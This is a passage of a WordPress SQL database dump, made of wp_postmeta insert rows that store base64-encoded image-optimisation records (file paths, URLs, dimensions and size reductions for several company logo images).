bWUiOjE0ODM1NjgwNTUsImlkIjoxNjI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTItZTE0NzM3OTAyNjY1ODMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMi1lMTQ3Mzc5MDI2NjU4My0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby0yLWUxNDczNzkwMjY2NTgzLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxOTksInRpbWUiOjE0ODM1NjgwNTcsImlkIjoxNjI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTItZTE0NzM3OTAyNjY1ODMtMzAweDE5OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMi1lMTQ3Mzc5MDI2NjU4My0zMDB4MTk4LmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMTk4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby0yLWUxNDczNzkwMjY2NTgzLTMwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MDU5LCJpZCI6MTYyNH1d'); 
INSERT INTO `wp_postmeta` VALUES (29376, 1622, 'wpfc_optimisation_reduction', '1460'); 
INSERT INTO `wp_postmeta` VALUES (29377, 1622, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTEtZTE0NzM3OTAwNDQyMjkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMS1lMTQ3Mzc5MDA0NDIyOS5qcGciLCJ3aWR0aCI6NDgwLCJoZWlnaHQiOjE5OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby0xLWUxNDczNzkwMDQ0MjI5LmpwZyIsInJlZHVjdGlvbiI6MTI5OSwidGltZSI6MTQ4MzU2ODA2NSwiaWQiOiIxNjIyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMS1lMTQ3Mzc5MDA0NDIyOS0zNDB4MTk4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby0xLWUxNDczNzkwMDQ0MjI5LTM0MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmF6by1sb2dvLTEtZTE0NzM3OTAwNDQyMjktMzQweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgwNjcsImlkIjoxNjIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby0xLWUxNDczNzkwMDQ0MjI5LTI1MHgxOTguanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTEtZTE0NzM3OTAwNDQyMjktMjUweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMS1lMTQ3Mzc5MDA0NDIyOS0yNTB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODA2OSwiaWQiOjE2MjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTEtZTE0NzM3OTAwNDQyMjktMjAweDE5OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMS1lMTQ3Mzc5MDA0NDIyOS0yMDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby0xLWUxNDczNzkwMDQ0MjI5LTIwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MDcxLCJpZCI6MTYyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMS1lMTQ3Mzc5MDA0NDIyOS0yMjV4MTk4LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby0xLWUxNDczNzkwMDQ0MjI5LTIyNXgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmF6by1sb2dvLTEtZTE0NzM3OTAwNDQyMjktMjI1eDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgwNzMsImlkIjoxNjIyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTEtZTE0NzM3OTAwNDQyMjktMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMS1lMTQ3Mzc5MDA0NDIyOS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby0xLWUxNDczNzkwMDQ0MjI5LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxNTYsInRpbWUiOjE0ODM1NjgwNzUsImlkIjoxNjIyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTEtZTE0NzM3OTAwNDQyMjktMzAweDE5OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMS1lMTQ3Mzc5MDA0NDIyOS0zMDB4MTk4LmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMTk4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby0xLWUxNDczNzkwMDQ0MjI5LTMwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MDc3LCJpZCI6MTYyMn1d'); 
INSERT INTO `wp_postmeta` VALUES (29378, 1620, 'wpfc_optimisation_reduction', '1275'); 
INSERT INTO `wp_postmeta` VALUES (29379, 1620, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWxvZ28tMS1lMTQ3Mzc4OTc2NzM3MC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sb2dvLTEtZTE0NzM3ODk3NjczNzAuanBnIiwid2lkdGgiOjQ4MCwiaGVpZ2h0IjoxOTgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbG9nby0xLWUxNDczNzg5NzY3MzcwLmpwZyIsInJlZHVjdGlvbiI6MTIxMSwidGltZSI6MTQ4MzU2ODA4NCwiaWQiOiIxNjIwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbG9nby0xLWUxNDczNzg5NzY3MzcwLTM0MHgxOTguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWxvZ28tMS1lMTQ3Mzc4OTc2NzM3MC0zNDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1sb2dvLTEtZTE0NzM3ODk3NjczNzAtMzQweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgwODYsImlkIjoxNjIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sb2dvLTEtZTE0NzM3ODk3NjczNzAtMjUweDE5OC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbG9nby0xLWUxNDczNzg5NzY3MzcwLTI1MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWxvZ28tMS1lMTQ3Mzc4OTc2NzM3MC0yNTB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODA4OCwiaWQiOjE2MjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWxvZ28tMS1lMTQ3Mzc4OTc2NzM3MC0yMDB4MTk4LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sb2dvLTEtZTE0NzM3ODk3NjczNzAtMjAweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbG9nby0xLWUxNDczNzg5NzY3MzcwLTIwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MDkwLCJpZCI6MTYyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbG9nby0xLWUxNDczNzg5NzY3MzcwLTIyNXgxOTguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWxvZ28tMS1lMTQ3Mzc4OTc2NzM3MC0yMjV4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1sb2dvLTEtZTE0NzM3ODk3NjczNzAtMjI1eDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgwOTIsImlkIjoxNjIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWxvZ28tMS1lMTQ3Mzc4OTc2NzM3MC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1sb2dvLTEtZTE0NzM3ODk3NjczNzAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbG9nby0xLWUxNDczNzg5NzY3MzcwLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo1OSwidGltZSI6MTQ4MzU2ODA5NCwiaWQiOjE2MjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbG9nby0xLWUxNDczNzg5NzY3MzcwLTMwMHgxOTguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWxvZ28tMS1lMTQ3Mzc4OTc2NzM3MC0zMDB4MTk4LmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMTk4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1sb2dvLTEtZTE0NzM3ODk3NjczNzAtMzAweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgwOTYsImlkIjoxNjIwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29380, 1618, 'wpfc_optimisation_reduction', '1177'); 
INSERT INTO `wp_postmeta` VALUES (29381, 1618, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy0yLWUxNDczNzg5NTIzNDg3LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy0yLWUxNDczNzg5NTIzNDg3LmpwZyIsIndpZHRoIjo0ODAsImhlaWdodCI6MTk4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc29sdnN5cy0yLWUxNDczNzg5NTIzNDg3LmpwZyIsInJlZHVjdGlvbiI6MTE0NiwidGltZSI6MTQ4MzU2ODEwMywiaWQiOiIxNjE4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2c3lzLTItZTE0NzM3ODk1MjM0ODctMzQweDE5OC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2c3lzLTItZTE0NzM3ODk1MjM0ODctMzQweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2c3lzLTItZTE0NzM3ODk1MjM0ODctMzQweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgxMDUsImlkIjoxNjE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZzeXMtMi1lMTQ3Mzc4OTUyMzQ4Ny0yNTB4MTk4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZzeXMtMi1lMTQ3Mzc4OTUyMzQ4Ny0yNTB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NvbHZzeXMtMi1lMTQ3Mzc4OTUyMzQ4Ny0yNTB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODEwNywiaWQiOjE2MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy0yLWUxNDczNzg5NTIzNDg3LTIwMHgxOTguanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy0yLWUxNDczNzg5NTIzNDg3LTIwMHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc29sdnN5cy0yLWUxNDczNzg5NTIzNDg3LTIwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MTEwLCJpZCI6MTYxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2c3lzLTItZTE0NzM3ODk1MjM0ODctMjI1eDE5OC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2c3lzLTItZTE0NzM3ODk1MjM0ODctMjI1eDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2c3lzLTItZTE0NzM3ODk1MjM0ODctMjI1eDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgxMTIsImlkIjoxNjE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy0yLWUxNDczNzg5NTIzNDg3LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy0yLWUxNDczNzg5NTIzNDg3LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc29sdnN5cy0yLWUxNDczNzg5NTIzNDg3LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoyNiwidGltZSI6MTQ4MzU2ODExNCwiaWQiOjE2MTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2c3lzLTItZTE0NzM3ODk1MjM0ODctMzAweDE5OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2c3lzLTItZTE0NzM3ODk1MjM0ODctMzAweDE5OC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjE5OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2c3lzLTItZTE0NzM3ODk1MjM0ODctMzAweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgxMTYsImlkIjoxNjE4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29382, 1617, 'wpfc_optimisation_reduction', '1573'); 
INSERT INTO `wp_postmeta` VALUES (29383, 1617, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2hpZWxkc3lzLTItZTE0NzM3ODk0OTc5OTMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaGllbGRzeXMtMi1lMTQ3Mzc4OTQ5Nzk5My5qcGciLCJ3aWR0aCI6NDgwLCJoZWlnaHQiOjE5OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NoaWVsZHN5cy0yLWUxNDczNzg5NDk3OTkzLmpwZyIsInJlZHVjdGlvbiI6MTUyNywidGltZSI6MTQ4MzU2ODEyMiwiaWQiOiIxNjE3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaGllbGRzeXMtMi1lMTQ3Mzc4OTQ5Nzk5My0zNDB4MTk4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NoaWVsZHN5cy0yLWUxNDczNzg5NDk3OTkzLTM0MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtY